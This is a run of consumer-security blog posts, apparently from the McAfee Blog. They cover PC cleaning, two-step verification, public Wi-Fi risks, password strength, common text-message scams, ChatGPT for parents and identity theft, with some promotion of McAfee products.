Cleaning your PC is an essential part of maintaining its performance. While it might not drastically increase your PC’s speed, it contributes to overall efficiency, responsiveness, and longevity. It’s important to approach PC cleaning carefully, deleting with discretion to avoid accidentally removing necessary files or applications. For those who aren’t comfortable doing it manually, reliable PC cleaning software like McAfee Total Protection can simplify the process and save time. Regular cleaning keeps your PC running smoothly, prevents potential threats, and ensures your personal and sensitive information is safe. So, if you haven’t started yet, it’s never too late to begin cleaning your PC and enjoy an optimized computing experience.

The post Does PC Cleaning Improve Performance? appeared first on McAfee Blog.

Every day, life for many consumers has become more “digital” than before—this has made day-to-day tasks easier for many of us, but it also creates new challenges. From online banking to medical records, protecting our private, personal information is imperative.

Too often, the same password is used for multiple online accounts—for instance, you might log in to your online banking site with the same password you use for your personal email account. In a McAfee survey, 34% of people reported that they use the same password for multiple online accounts. Using identical passwords is convenient for us as users, but it’s also convenient for any hacker trying to steal personal information—once a hacker has access to one of your accounts, he can use a recycled password to snoop around at will.

Addressing Password Reuse and Complexity

Certainly, using more than one password and passphrases that include a mix of upper and lower case letters, numbers, and symbols and is at least ten characters in length goes a long way towards keeping malicious people at bay, but unfortunately, merely adding variety to your login information doesn’t guarantee security. In The Easiest Ways to Not Get Hacked, author Rebecca Greenfield included this chart showing just how much difference one character in length makes:

One of the most important accounts to keep secure is your primary email account—and here’s why: sooner or later, we all have to use the “I forgot my password” option, which typically sends a password reset email.

A hacker only needs to crack the password for your primary email account, and he’ll be able to access any of your other secure accounts simply by clicking the “forgot password” button when he sees it. This is known as a single point of failure, meaning it’s the one piece in any system that can bring down your whole system.

McAfee Pro Tip: If you’re having trouble remembering all your complex passwords on multiple accounts, a password manager can help you save time and effort while securing your accounts and devices. Learn more about McAfee’s password manager.

The Power of Two-step Verification

Establishing a separate email account for registration is one idea—in other words, your “I forgot my password” emails would all be sent to an account other than your primary email account. But even in that situation, there’s still only one password between a hacker and most of the data you want to keep from a hacker’s hands—from financial accounts and bank access to your weekly grocery delivery service. So the real question, even if you’re savvy enough to have a separate email address for password rescue, is: how do you make any email account more secure?

Two-step verification (often referred to as two-factor authentication) is a system designed to give you an extra layer of security that’s easy to use and indispensable for commercial or highly sensitive accounts. Two-step verification protects your email with not only a password but also by associating your account with a specific device or devices. A recent example of how this works comes from Google. In the case of Google’s two-step verification for Gmail accounts, a user simply re-authorizes the account every 30 days, by providing a numeric code that confirms the account.

→ Dig Deeper: Two-Factor vs. Multi-Factor Authentication: What’s the Difference?

How does it Work?

The extra step and learning a new system of security sounds like an enormous hassle, but Google has taken the pain out of the process by allowing you to obtain the code in one of three ways:

• Via Text: Google can send you a text message containing the code.
• Via an Authenticator App: You can download a free app that will generate a randomized code at the time of sign-in
• Via a Phone Call: You can receive an automated voice message to a non-mobile phone that tells you the code.

This means that a hacker who wants to access your email account can only do so if he has access to your text messages or your landline phone. It might not stop every cybercriminal, but it does make the average hacker’s job a lot harder.

McAfee Pro Tip: Some hackers may go as far as calling your personal numbers, if they have access to them, and ask for your two-factor verification code to access your financial accounts, citing that they need it for their ongoing promotions or measures to improve your account security. This is a social engineering tactic that you should familiarize yourself with. Learn more about social engineering.

Adoption and Future Trends

This two-factor authentication, while not new, is making major inroads among websites, apps, and services that process critical information. Many corporations have used hardware-based secondary authentication codes for years, but Google and others (including Twitter) are working hard to make this enhanced authentication flow a more practical and accessible part of our working lives.

New biometric verification options, such as a retina or fingerprint scan, are also catching on among security-conscious consumers, and will likely be a feature on more devices in the future. As times change, and more sensitive information flows through these sites, we can be sure to see more of these processes put into place.

→ Dig Deeper: How Virtual Reality and Facebook Photos Helped Researchers Hack Biometric Security

Understanding the Benefits of Two-step Verification

Two-step verification offers multiple benefits in the world of digital security. The key merit is that it presents an extra hurdle for hackers to overcome. If a hacker has breached your password, they still have to pass the second level of verification. As such, two-step verification makes your information harder to access, giving you added peace of mind.

Apart from enhancing security, two-step verification simplifies the recovery process if you ever forget your password. Since you have set up a secondary recovery method, you can use it to reset your password. This reduces the risk of losing access to your account due to forgotten passwords.

→ Dig Deeper: Let’s Make Security Easy

Implementing Two-step Verification: A Step-by-Step Guide

Setting up two-step verification on your accounts is relatively straightforward process. The first step is to go to the account settings of the platform where you want to enable this feature. Once you are there, locate the two-step verification or two-factor authentication option. Click on it, and follow the prompts. Typically, the system will ask for your phone number or an alternative email address to send the verification code to complete the process. Once that is done, you are all set.

From then on, every time you log in, you will need to input not only your password but also a unique code sent to your phone number or alternative email. Remember to choose a method that is convenient for you. For instance, if you are always on your phone, it may be easier to opt for the text message verification code option. This ensures that you can always promptly complete the second step of verification whenever you log in.

→ Dig Deeper: Protect Your Social Passwords with Two-Step Verification

Challenges and Limitations of Two-step Verification

While two-step verification offers an added layer of security, it is not foolproof. One potential challenge is that a hacker could intercept the verification code. Despite its rarity, this type of security breach is possible and has occurred. Furthermore, you might face issues if you lose the device used for verification. For example, if you lose your phone and have set it up for receiving verification codes, you might struggle to access your accounts.

Moreover, two-step verification can be inconvenient for some people. It adds an extra step every time you log in, and if you do not have immediate access to your verification device, you might be locked out of your accounts. Despite these challenges, the benefits of two-step verification far outweigh the potential drawbacks, and it remains a robust and recommended security measure in the digital era.

Final Thoughts

In conclusion, two-step verification offers a critical layer of security in protecting your digital assets. As life becomes increasingly digitized, and we continue to store more personal and sensitive information online, it is crucial to employ strong security measures like two-step verification. While it might seem like a bit of a hassle at times, the added security it provides, the peace of mind and the protection of your personal information make it a worthwhile endeavor. As the old saying goes, “It’s better to be safe than sorry.”

Therefore, embrace two-step verification and make it harder for hackers to gain access to your information. After all, security in the digital sphere is not a luxury, but a necessity.

To further protect your digital assets, consider McAfee+, our most comprehensive online protection software. Protect your mobile, laptops, computers, and IoT devices with reputable security software.

The post Make a Hacker’s Job Harder with Two-step Verification appeared first on McAfee Blog.

With the digital lifestyle becoming more prevalent, Wi-Fi connections have become a necessity in our day-to-day lives. We frequently connect our devices to available Wi-Fi at various locations such as hotels, restaurants, cafes, and airports. The ability to be connected anywhere, anytime is extraordinary, but it also presents a significant security concern. Unsecured Wi-Fi networks can expose our personal and sensitive data to potential hackers.

These hackers can gain access to our personal data stored on our devices or observe our online activities, thereby infringing our digital privacy. Sometimes, they purposely set up deceitful free Wi-Fi connections or hotspots to entice unsuspecting users and exploit their data. Therefore, it’s important to understand the risks associated with unsecured Wi-Fi connections and adopt certain preventive measures to ensure the safety of our personal data.

Risks of Using Free Wi-Fi or Hotspots

Using free Wi-Fi or hotspots can indeed be convenient for users when they’re away from their secure home networks. However, such networks usually lack proper security measures, rendering them highly susceptible to various cyber attacks. Hackers often target these networks as it is easier to infiltrate and access users’ data.

The most common risk is the interception of data, where hackers can view and steal sensitive information such as usernames, passwords, and credit card details. They can also inject malware into your device through the insecure network, further compromising your data and device’s security. Additionally, the Wi-Fi you’re connecting to might be a rogue hotspot set up by hackers, designed specifically to steal user information. Therefore, the use of such networks should be approached cautiously.

→ Dig Deeper: KRACK Hack Threatens Wi-Fi Security – What it Means for You

McAfee Pro Tip: The most secure Wi-Fi network is the one that remains inactive. Deactivating the Wi-Fi signal on your device ensures that your device remains invisible, preventing your mobile from automatically connecting to any available Wi-Fi network. Pick up more tips on this blog.

Preventive Measures When Using Wi-Fi Connections

Despite these risks, there are several steps that you can take to ensure your cybersecurity while using Wi-Fi connections. Firstly, it’s a good practice to turn off your Wi-Fi when you’re not using it. This prevents your device from automatically connecting to available networks, reducing the risk of connecting to an insecure network. Equally important is avoiding the use of sensitive applications or websites, like online banking services, when connected to a public network.

→ Dig Deeper: Elevate Your Financial Security: How to Safely Bank Online

Another preventive measure is to use only websites that support HTTPS protocol. The usage of HTTPS, as against HTTP, ensures secure communication over the network as the data is encrypted. This reduces the chances of your data being intercepted by hackers. Hence, always look for “HTTPS://” in the address bar of your internet browser before sharing any sensitive information.

Advanced Security Measures

For an extra layer of security when using public Wi-Fi or hotspots, you might want to consider investing in a Virtual Private Network (VPN). A VPN encrypts your internet connection, making it virtually impossible for hackers to intercept and view your data. While you’re connected to a VPN, all your network traffic passes through this protected tunnel, and no one—not even your ISP—can see your traffic until it exits the tunnel from the VPN server and enters the public internet.

→ Dig Deeper: On Public Wi-Fi, a VPN is Your Friend

It is also advisable to keep all your devices, browsers, and apps updated with the latest security patches. Hackers frequently exploit known vulnerabilities in outdated software, so ensuring you have the latest updates can help prevent unauthorized access to your data. Enabling automatic updates ensures that your software is always up-to-date, further protecting against potential threats.

→ Dig Deeper: Why Software Updates Are So Important

Enhancing Protections at Home

Protecting your home Wi-Fi is equally important. Always password-protect your home network with a strong, unique password, and consider changing the default user name and password that come with your router. Default logins can be easily found by attackers, making it easier for them to gain unauthorized access. Additionally, changing your router’s default Service Set ID (SSID) can make it more difficult for hackers to identify and target your network.

Another step you can take is to set up a guest network for visitors to your home. This limits their access to your main network, where your sensitive information and devices are connected. Be sure to change the password for your guest network regularly, especially after hosting guests. Lastly, turning off your network when you’re not using it, especially when you’re away from home for extended periods, can reduce the risk of unauthorized access.

→ Dig Deeper: How to Secure Your Home Wi-Fi

Enhancing Protections on Mobile

Smartphones have become indispensable tools for communication, work, and leisure. However, with the convenience of accessing Wi-Fi networks on these devices comes the responsibility of ensuring their security.

First and foremost, prioritize trusted networks, such as your home or office, over open or public networks. Ensure that your connections are encrypted, preferably using WPA2 or WPA3, for data protection. Create robust, unique passwords for both your Wi-Fi network and your device connections.

Furthermore, employ two-factor authentication (2FA) for added security, especially for accounts linked to Wi-Fi access. Again, a VPN can further bolster your defenses by encrypting your internet traffic, making it indispensable when using public Wi-Fi networks. But it’s also important to keep your mobile device’s software up-to-date to ensure you benefit from the latest security patches.

Finally, be wary of connecting to mobile hotspots created by other devices, as these can pose security risks if not adequately secured, and regularly audit app permissions on your mobile device and restrict access to sensitive data whenever possible.

By following these measures and best practices, you can significantly enhance the security of your mobile devices when connecting to Wi-Fi networks, safeguarding your digital privacy and peace of mind.

Final Thoughts

With the growing reliance on Wi-Fi connections to access the internet on our devices, it’s crucial to understand the security risks associated with public Wi-Fi or hotspots. Unauthorized access, data interception, and malware infections are some of the key risks when using these connections. However, by adopting appropriate measures such as using secure websites, turning off Wi-Fi when not in use, using VPN, and bolstering home network security, we can significantly mitigate these risks and ensure our personal data’s safety. So the next time you connect to a Wi-Fi network, remember to exercise caution and take steps to protect your personal information.

We encourage you to improve the layers of your digital and device security for optimal protection. Browse McAfee’s software solutions to find the best software that suits your needs.

The post Why Should You be Careful When Using Hotspots or Free Wi-Fi? appeared first on McAfee Blog.

In today’s digital world, the importance of creating and maintaining secure and complex passwords cannot be overstated. A common misconception is that a password only needs to be memorable. Whilst this is a helpful trait, it does a disservice to the importance of having a secure series of characters. This guide will walk you through why “123456” is not an acceptable password, dispel some common password misconceptions, and provide some tips on how to create a secure password.

Understanding the Importance of Secure Passwords

Security is a necessary concern in the digital age. Every time we create an account, fill out a form, or simply browse the internet, we leave a digital footprint that can be traced back to us. Criminals, hackers, and other malicious parties are constantly hunting for sensitive information they can exploit. This is what makes the creation of secure passwords so vital.

Think of your password as the first line of defense against potential attackers. When your passwords are weak or predictable, like ‘123456’, you effectively leave your front door open to criminals. While it may feel like an inconvenience to memorize complex passwords, consider the potential damage that could be done should your personal or financial information fall into the wrong hands.

→ Dig Deeper: Protect Your Digital Life: Why Strong Passwords Matter

Why ‘123456’ Is Not a Good Password

Some may argue that ‘123456’ is a good password because it’s easy to remember. This is a dangerous misconception. ‘123456’ is an extremely common password, and it’s also one of the first combinations that hackers attempt when trying to break into an account. In fact, according to reports, ‘123456’ and ‘password’ are consistently ranked as the most commonly used passwords year after year.

Another reason why ‘123456’ is not a good password is due to its lack of complexity. Many websites and online services require passwords to include a mix of upper and lower-case letters, numbers, and symbols. This requirement is not arbitrary; it’s a method proven to increase the difficulty for hackers attempting to crack your password. Using ‘123456’ as your password doesn’t meet these requirements, making it an easy target for a hacking attempt.

→ Dig Deeper: Six Easy Steps to Help Keep Hackers at Bay

Essential Checks for a Secure Password

Ensuring that your password adheres to certain safety standards is crucial. Here are some key checks to consider when creating a password:

• Don’t Use a Real Word: If your password contains a word that can be found in the dictionary, it’s time to change it. Using names of favorite items or pets can be easily guessed by hackers. Opt for an invented word, a blend of unique phrases or even nonsensical gibberish. The more unique, the better your security.
• Mix It Up: Since most password systems are case-sensitive, using a mixture of upper and lower case letters can make your password more secure. Introduce numbers and symbols to make it more complex and avoid obvious choices like birthdays or the infamous ‘123456’.
• Default is Fault: All “smart” devices come with default passwords. From your latest smart home appliance to your phone, always change the provided password immediately after setup. This step, combined with regularly updating passwords, can greatly increase your protection.

→ Dig Deeper: Make Your Smart Home a Secure Home Too: Securing Your IoT Smart Home Devices

• One Password Doesn’t Fit All: Never use the same password for multiple accounts. While it may seem difficult to remember multiple complex passwords, using a password management solution can help keep track of all your login information and generate unique, secure passwords for you.

Your proactive approach to password security is the bedrock of your defense against evolving cyber threats, ensuring your digital life remains safe and sound. Make sure to follow these reminders every time you create and change passwords.

Password Manager As An Option

Password managers are specialized tools that generate, store, and autofill complex and unique passwords for various online accounts. They eliminate the need for users to remember and manually enter their passwords, and this not only simplifies the login process but significantly bolsters security. These tools employ strong encryption to safeguard your login credentials, ensuring your passwords remain inaccessible to hackers. Many password managers also offer the convenience of cross-device synchronization, allowing you to access your passwords securely on multiple platforms.

Cybersecurity threats are more sophisticated than ever, and easily guessable passwords are the first vulnerabilities that malicious actors exploit. So, as you aim to make your 123456 passwords more complicated, consider using a password manager to store all your passwords and help you remember them properly.

Changing Passwords: A Habit to Develop

Changing passwords frequently is a habit we all need to cultivate. Doing so regularly makes it very difficult for cybercriminals to gain access to your personal information. It’s not just about protecting your accounts, but every device that holds your precious data. This habit, though may seem cumbersome initially, will eventually act as a robust shield against potential cyber attacks. Interest in cyber security is rising, and for a good reason. With more of our lives moving online, it’s crucial to stay updated on the latest trends in mobile and digital security. Many resources are available online to help individuals stay safe in the digital world. Maintaining strong, unique passwords and changing them frequently is one of the simplest and most effective ways to safeguard against cyber threats.

How Often You Should Change Passwords

The frequency of changing passwords should be tailored to the security sensitivity of the account and the strength of the existing password. For high-security accounts, such as email or online banking, changing passwords every 60 to 90 days is advisable, while moderate-security accounts can be changed every 90 to 180 days. Low-security accounts may require less frequent changes, and immediate password updates are essential if you suspect a compromise. Strong, unique passwords reduce the necessity for frequent changes, and the use of two-factor authentication further enhances account security.

McAfee Pro Tip: In certain circumstances, it might become imperative to change your password without delay, particularly when a malicious actor gains unauthorized access to your account. Learn more about how often you should change your passwords. 

Final Thoughts

‘123456’ is not an acceptable password due to its predictability and lack of complexity. Choosing secure passwords that are complex, unique, and difficult to guess is crucial in safeguarding your online presence. Coupled with regular password changes, using a password management solution, and avoiding default device passwords, you can ensure your personal and financial information remains secure. In the digital age, a secure password is not just a need, but a necessity. A reliable password manager, meanwhile, is a good, functional option to improve password security.

The post 123456 Is Not an Acceptable Password appeared first on McAfee Blog.

Getting a text message is a lot like someone calling out your name. It’s tough to ignore.

Delivery notifications, messages from your bank, job offers, and security alerts—those texts have a way of getting your attention. And scammers know it. In the U.S. alone, their text-based scams accounted for a reported $330 million in losses in 2022—nearly a 5x increase compared to 2019.

When it comes time for scammers to reach their victims, text messages are the top choice. Far more so than email or phone calls. Estimates show that up to 98% of people will read a text message. Half of them will answer it. Compare that to email, which has an open rate that hovers around 20% and a reply rate of 6%.

In all, text scams make for cheap, easy, and effective attacks. Even more so with the help of highly convincing messages scripted by AI.

Scammers simply have it easier and easier these days. Or so it can seem. Now you have an AI-powered tool that can finally put an end to those scam texts on your phone— McAfee Scam Protection.

Let’s check out the top scams out there today, and then how McAfee Scam Protection and a few other steps can make your time on your phone a lot less annoying and a lot safer as well.

The top five text scams.

According to the Federal Trade Commission (FTC), five specific text scams account for 42% of scams randomly sampled by the commission. Here’s how they stack up:

• Phony bank alerts and messages.
• Bogus gift offers that steal personal info.
• “Problems” with package deliveries.
• Job scams.
• Amazon imposter scams.

Sound familiar, like something that you’ve seen pop up on your phone? Chances are it does. In all, the scammers behind these texts want the same thing—your personal info, money, or a combination of both. They just take different routes to get there.

Beyond the top five, the other 58% of scams put their spin on their texts. However, different as they are, these scam texts have several common signs you can spot.

First off, they usually include a link. The link might include unusual strings of characters and a web address that doesn’t match who the message says it’s coming from. Like a bogus notice from the post office that doesn’t use the official post office URL. Or, the link might look almost like a legitimate address, but changes the name in a way that indicates it’s bogus.

Instead of a link, the text might contain a phone number to call. Sophisticated scam operations run call centers that work much like legitimate call centers—although scammers design them to steal your money and personal info.

The message might employ a scare tactic or threat. Scammers love this approach because it successfully plays on people’s emotions and gets them to act quickly without much thinking.

Sometimes, the text might be a seemingly innocent message. Like, “Is this Steven’s number?” Or, “I’ll always love you.” Sometimes it’s only a simple, “Hi.” This is by design. The scammer wants to pique your curiosity, or your desire to be helpful, and then respond. From there, the scammer will try to strike up a conversation, which can lead to a romance scam or a similar con game like an online job scam.

How to spot the top five text scams.

Fortunately, scammers tend to follow a basic script. You’ll see variations, of course. Yet these texts share common elements, just as text scams in general do. That makes them easy to spot.

Be on the lookout for:

Bank scams like, “BANK FRAUD ALERT: Did you make a $4,237.95 purchase at Jacuzzi World? Please confirm!” You’ll know if it’s a scam if the text:

• Was sent from an institution you don’t bank with. That’s an immediate sign.
• Comes from an unrecognizable and unofficial number.
• Requests you to tap a link or call the number—likely to provide personal info.

Gift scams like, “ATT FREE MESSAGE. Thanks for paying your bill. Click here for a reward.” First, you can note that the scammer spelled the phone carrier AT&T incorrectly. Other signs of a scam include:

• The text involves tapping a link to claim your (bogus) prize—or calling an unknown number.
• It involves paying a fee for shipping your (bogus) prize.
• It similarly calls for submitting account or personal info to pay for your (bogus) winnings.
• The payout is for a lottery or giveaway you never entered.

Delivery scams like, “We were unable to deliver your shipment. Please update your info so that we can get your package to you.” This is a common one, and you can spot it several ways:

• First off, you’re not expecting a package. Let alone one from the “company” that sent you the text.
• It contains a link that doesn’t look like it directs you to an official site, like UPS or FedEx.
• If you’re in North America, look at the number of the sender. Some scammers text from an overseas location. This can result in a long phone number that contains a country code with a “+” in front of it.

Job scams like, “BE A SECRET SHOPPER. Make $500 per store! Click the link to get started!” A company that hires employees by sending thousands of spammy texts isn’t a company at all. It’s a scam. Other signs are:

• They ask you to tap a link or call a number, once again.
• The link looks like a string of nonsense or like a slightly fudged version of a legitimate web address.
• The job offer seems too good to be true. (Because it is.)

Amazon scams like, “TRANSACTION ALERT: Your purchase of a 65” QLED TV for $1,599.99 is confirmed. Not you? Contact us to cancel the order.” This is a spin on the bank fraud alert, with the scammers posing as Amazon’s fraud team. Aside from using the Amazon name, other signs include:

• The text lists a big-ticket item with a big price tag to get your attention.
• There’s a sense of urgency. The text implies you need to act quickly to cancel the order.
• You have a number to call or a link to tap, which puts you in touch with a phony customer care rep.

Now, how to avoid text scams.

With what you need to spot scam texts, now you can avoid the damage they can do. And you can take additional steps to keep them from reaching you altogether.

1. Don’t tap on links in text messages: If you follow one piece of advice, it’s this.

2. Follow up directly: If you have concerns, get in touch with the company you think might have sent it. Manually type in their website and enquire there. Again, don’t tap any links.

3. Clean up your personal data: Scammers must have gotten your number from somewhere, right? Often, that’s an online data broker—a company that keeps thousands of personal records for millions of people. And they’ll sell those records to anyone. Including scammers. A product like our Personal Data Cleanup can help you remove your info from some of the riskiest sites out there.

4. Get scam protection: Using the power of AI, our new McAfee Scam Protection can alert you when scam texts pop up on your phone. And as a second line of defense, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.

Also, consider playing a part in the solution.

Businesses, agencies, and law enforcement work together to shut down scams. Many of them have websites and points of contact for reporting fraud. Netflix offers a good example, and so does the Internal Revenue Service (IRS) in the U.S. McAfee has a page dedicated to fraud as well.

Further, in the U.S., you can also report it to the FTC at https://www.ReportFraud.ftc.gov. Similarly, they use and share reports with law enforcement partners to help with investigations.

If you spot a clear imposter or scam, give some thought to grabbing a screenshot and reporting it.

You have what it takes to stop text scams.

Even as scammers’ attacks get more sophisticated, the tools that can beat them are more sophisticated as well. In part thanks to AI. With a sharp eye, tools like McAfee’s Scam Protection can help you steer clear of text scams.

With both in place, you can improve the chances that your next incoming text is from a friend that brings a smile to your face—instead of a scam text that leaves you shaking your head.

The post Hold onto Your Phone, and Your Wallet – The Top Five Text Scams appeared first on McAfee Blog.

I have a confession to make – I so wish ChatGPT was around when my kids were younger. I realise that it’s not perfect but in my opinion, it’s like having a personal digital assistant to help you wade through those super heavy parenting years. Imagine how helpful it would be to have your ‘assistant’ develop a personalised bedtime story for your 6-year-old or, work out what you can cook with just the ingredients in your fridge!! I am so sure I would have been a more relaxed mother if I had ChatGPT working for me!!

How Does ChatGPT Work?

ChatGPT is an amazing website that allows you to have human-like conversations with a chatbot that is driven by Artificial Intelligence (AI) technology. The chatbot can answer your questions, compose emails and essays, translate text, develop code and more. At the time of writing, there is a free version of ChatGPT available which gives the user unlimited access however the paid premium version of $US20 per month gives priority access during peak times, faster response speeds and exclusive access to GPT-4 – a smarter and more capable chatbot!

If you’d like to know more about it, check out my Parents’ ChatGPT Guide which will help fill in the blanks.

How ChatGPT Can Make You A Better Parent

There are so many ways ChatGPT can reduce the stress of parenting and give you some much-needed head space. Here are my top 5:

1. What’s For Dinner?

If I look back at the super intense parenting years when I was working full-time with 4 kids, one of the greatest causes of my stress was dinner. I often wouldn’t have the physical energy to read a recipe book or stop at the shops after an afternoon of school and extra-curricular pickups so I would be scrambling to feed a bunch of ravenous boys. Imagine how good it would be to have your digital assistant, aka ChatGPT, devise a recipe based on what you have in your fridge and pantry? Nothing short of life-changing, in my opinion. And it can even factor in dietary restrictions! So clever!!

2. Can You Tell Me A Bedtime Story

My boys loved bedtime stories – preferably personalised! I know, very demanding!! Now, with 4 separate stories to deliver every night, you can only imagine how much mental energy this required. But if I had ChatGPT working for me, this would take just seconds to solve. Simply enter the name and age of the child (no surnames), the setting, the names of other characters that should be included, and then a theme e.g. hero’s journey, determination, friendship, and wham bam – you’ve got something ready to go!

3. Your Next Holiday – Sorted!

When things are so hectic, it is often the thought of a vacation that can keep you going. However, let’s be honest, successful holidays take quite a bit of planning to get right. Well – that’s where your digital assistant can help. If you ask, ChatGPT can develop itineraries with activity suggestions. It can also recommend hotels – simply ask it for suggestions within a specific location e.g. close to the Eiffel Tower. And it can also tailor its recommendations based on your budget. After planning and managing family holidays for my clan of 6 for well over 20 years, this is a life-changing feature!

4. The Best Birthday Party Checklist Ever

Far out, birthday parties can be stressful experiences. Invitations, themes, venue, entertainment, kids’ food, lolly bags, parents’ food, parents’ drinks, the list goes on and on. But if you haven’t already put ChatGPT to work as a party planner – then you’re missing out. Simply type in the age of the child and it can give you an entire plan. It will also give you 20-25 top tips that I guarantee will ensure you have everything covered!

5. Homework Help

If you’ve got a tribe of kids who are all at various levels and need homework help, then staying up to date with maths and science can be quite exhausting – particularly after a long day at work! Simply entering ‘explain’ or ‘explain so a 10-year-old can understand’ into ChatGPT will provide you with enough smarts to get that homework done. Of course, fact-checking ChatGPT is essential but what it will provide is some momentum in the right direction.

But A Word of Caution

ChatGPT can absolutely make your life easier as a parent but there are a few things to remember before you start typing into that chat box.

1. It Doesn’t Always Get Everything Right

It’s important to double-check everything. Ensure your kids also appreciate that everything online needs to be double-checked.

2. Be Mindful of Your Privacy When Using It

For a full explanation of its impact on privacy and how you can protect yourself, check out my recent blog post about . But to summarise: be careful what you share in the chat box, stay anonymous, and consider deleting your chat history.

3. Consider How You Use It With Your Kids

One of the biggest negatives of ChatGPT is its potential impact on creativity and thinking skills. Some schools and universities have banned its use while others have specialised programs that supposedly can detect whether a student has used it. While it does sadden me that our kids won’t need to struggle over complex maths questions or English essays like we did, I am a realist and believe that whether we like it or not – it is here to stay. My prediction is that the school and university systems will adapt because generative AI will be a part of our kids’ world. Our role as parents and educators is to teach them how to use it safely and with a critical-thinking mindset.

So, if you’ve dreamed about hiring a personal assistant (I do regularly!) then you so need to check out ChatGPT. It will help you get through your ‘to-do’ list, save you so much time and energy which means you’ve got more time to spend with your kids – or by yourself under a tree. You choose!!

Till Next Time

Stay Safe Online

Alex

The post Could ChatGPT Be The Best Thing That’s Ever Happened To Your Family? appeared first on McAfee Blog.

Let’s be honest, talking to your kids about identity theft isn’t probably top of your list. There’s a long list of topics to cover off when you are a parent. But if you take a minute to picture someone stealing your child’s identity or using their personal information to take out a loan for a shiny new car then you’ll probably want to move it closer to the top of your parenting to-do list!

What Is Identity Theft?

Identity theft occurs when a person’s personal identifying information is used without their permission, usually to commit fraud by making unauthorised purchases or transactions. Identity theft can happen in many ways, but its victims are usually left with significant damage to their finances, credit score, and even their mental health.

Most people associate identity theft with data breaches – think Optus, Latitude Financial and Medibank – however, there are many more ways that scammers can get their hands on your personal identifying details. They can use ‘phishing’ emails to get information from you, do a deep dive on your social media accounts to find identifying information in posts or photos, hack public Wi-Fi to access any information you share or simply, steal your wallet or go through your trash!!

How Big An Issue Is It Really?

In short, it’s a big problem – for both individuals and organisations. And here are the statistics:

• 76,000 cybercrime reports were made in the 2021/22 financial year, an increase of nearly 13% from the previous year, according to The Annual Cyber Threat Report by The Australian Cyber Security Centre (ACSC).
• A recent study by The Australian Cybercrime Survey showed that 31% of respondents had experienced identity crime in their lifetime and 20% within the previous 12 months. Just under half of the victims reported that they had noticed suspicious transactions on their bank statements. Although 25% of respondents couldn’t identify how their information was stolen, 16% attributed it to the hacking of a computer or device.
• 10 million Australians had their personal details stolen in the Optus data breach in September 2022.
• 7 million Australians also had personal data stolen in the Medibank data breach in October 2022.
• 14 million Australians had their personal information stolen in the Latitude Financial data breach in March 2023.

How Do You Know If You’re a Victim?

One of the biggest issues with identity theft is that you often don’t immediately know that you’re a victim. In some cases, it might take weeks before you realise that something is awry which unfortunately, gives the thief a lot of time to wreak havoc! Some of the signs that something might be wrong include:

• Unfamiliar charges to your bank account
• Calls and texts about products or services that you’ve never used
• You’re denied credit
• Strange emails in your inbox
• Not receiving expected mail
• Unexpected calls or letters from debt collectors

What To Do If You Think You’re a Victim

The key here is to act as soon as you believe you are affected. Don’t stress that there has been a delay in taking action – just take action now! Here’s what you need to do:

1. Call Your Bank

Your first call should be to your bank so they can block the affected account. The aim here is to prevent the scammer from taking any more money. Also remember to block any cards that are linked to this account, either credit or debit.

2. Change Your Passwords

If your identity has been stolen then it’s highly likely that the scammer knows your passwords so change the passwords for the affected accounts straight away!! And if you have used this same password on any other accounts then change these also. If you can’t remember, you can always reset the passwords on key accounts just to be safe.

3. Report It

It may feel like a waste of time reporting your identity theft, but it is an important step, particularly as your report becomes a formal record – evidence you may need down the track. It may also prevent others from becoming victims by helping authorities identify patterns and hopefully, perpetrators.  If you think your personal identifying information has been used, report it to the Australian authorities at ReportCyber.

4. Make a Plan

It’s likely you’re feeling pretty overwhelmed at what to do next to limit the damage from your identity theft – and understandably so! Why not make a contract with IDCARE? It’s a free service dedicated to assisting victims of identity theft – both individuals and organisations – in Australia and New Zealand.

How Do We Talk To Our Kids About It?

If there is one thing I have learned in my 20+ years of parenting, it is this. If you want to get your kids ‘onboard’ with an idea or a plan, you need to take the time to explain the ‘why’. There is absolutely no point in asking or telling them to do something without such an explanation. It is also imperative that you don’t lecture them. And the final ingredient? Some compelling statistics or research – ideally with a diagram – my boys always respond well to a visual!

So, if you haven’t yet had the identity theft chat with your kids then I recommend not delaying it any further. And here’s how I’d approach it.

Firstly, ensure you are familiar with the issue. If you understand everything I’ve detailed above then you’re in good shape.

Secondly, arm yourself with relevant statistics. Check out the ones I have included above. Why not supplement this with a few relevant news stories that may resonate with them? This is your ‘why’.

Thirdly, focus on prevention. This needs to be the key focus. But don’t badger or lecture them. Perhaps tell them what you will be doing to minimise the risk – see below for your key ‘hot tips’ – you’re welcome!

What You Can Do To Manage Identity Theft?

There are a few key things that you can today that will both minimise your risk of becoming a victim and the consequences if you happen to be caught up in a large data breach.

1. Passwords

Managing passwords for your online accounts is one of the best risk management strategies for identity theft. I know it’s tedious, but I recommend creating a unique and complex 10+ digit password for each of your online accounts. Tricky passwords make it harder for someone to get access to your account. And, if you use the same log-in details for each of your online accounts – and your details are either leaked in a data breach or stolen – then you could be in a world of pain. So, take the time to get your passwords sorted out.

2. Think Before You Post

Sharing private information about your life on social media makes it much easier for a scammer to steal your identity. Pet names, holiday destination and even special dates can provide clues for passwords. So, lock your social media profiles down and ensure your privacy settings are on.

3. Be Proactive – Monitor Your Identity Online

Imagine how good it would be if you could be alerted when your personal identifying information was found on the Dark Web? Well, this is now a reality! McAfee’s latest security offering entitled McAfee+ will not only protect you against threats but provide 24/7 monitoring of your personal details so it can alert you if your information is found on the Dark Web. And if your details are found, then advice and help may also be provided to remedy the situation. How good!!

4. Using Public Computers and Wi-Fi With Caution

Ensuring you always log out of a shared computer is an essential way of keeping prying eyes away from your personal identifying information. And always be super careful with public Wi-Fi. I only use it if I am desperate and I never conduct any financial transactions, ever! Cybercriminals can ‘snoop’ on public Wi-Fi to see what’s being shared, they can stage ‘Man in The Middle Attacks’ where they eavesdrop on your activity, or they can lure you to use their trustworthy sounding Wi-Fi network – designed purely to extract your private information!

5. Monitor Your Bank Accounts

Why not make a habit of regularly checking your bank accounts? And if you find anything that doesn’t look right contact your bank immediately to clarify. It’s always best to know if there is a problem so you can address it right away.

With so many Aussies affected by data breaches and identity theft, it’s essential that our kids are armed with good information so they can protect themselves as best as possible. Why not use your next family dinner to workshop this issue with them?

Till Next Time

Stay Safe Online

Alex

The post How To Talk To Your Kids About Identity Theft appeared first on McAfee Blog.

The tables have turned. Now you can use AI to spot and block scam texts before they do you harm. 

You might have heard how scammers have tapped into the power of AI. It provides them with powerful tools to create convincing-looking scams on a massive scale, which can flood your phone with annoying and malicious texts. 

